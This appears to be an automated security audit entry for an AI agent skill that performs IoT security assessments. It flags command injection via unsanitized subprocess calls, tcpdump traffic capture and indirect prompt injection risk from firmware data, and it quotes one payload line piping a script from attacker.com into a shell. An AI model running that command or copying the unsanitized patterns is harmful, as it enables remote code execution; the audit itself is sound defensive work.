The Agent Skills Directory

[REMOTE_CODE_EXECUTION]: The SKILL.md file contains an explicit payload example ; wget http://attacker.com/shell.sh | sh within a security scenario description. This pattern represents a direct piped execution of a remote script from an untrusted source.
[COMMAND_EXECUTION]: The Python script scripts/agent.py makes extensive use of the subprocess.run() function to execute system tools including nmap, curl, binwalk, tcpdump, and openssl. User-supplied parameters such as target_ip, output_dir, and firmware_path are interpolated directly into shell commands without validation or sanitization, which allows for arbitrary command injection if an attacker can influence these inputs.
[DATA_EXFILTRATION]: The capture_traffic method in scripts/agent.py utilizes tcpdump to capture host-specific network traffic. While intended for security analysis, this capability can be abused to capture and expose sensitive network communications.
[INDIRECT_PROMPT_INJECTION]: The skill processes untrusted external data (firmware images) and its documentation contains actionable exploit strings.
Ingestion points: Firmware images provided by users and extracted filesystem content are processed by the agent.
Boundary markers: None observed; the agent processes findings and prints them directly to the console/JSON reports.
Capability inventory: The skill has significant capabilities including network scanning, file system writes, and traffic capture via subprocess calls in scripts/agent.py.
Sanitization: There is no evidence of sanitization for paths or IP addresses before they are used in shell commands.

performing-iot-security-assessment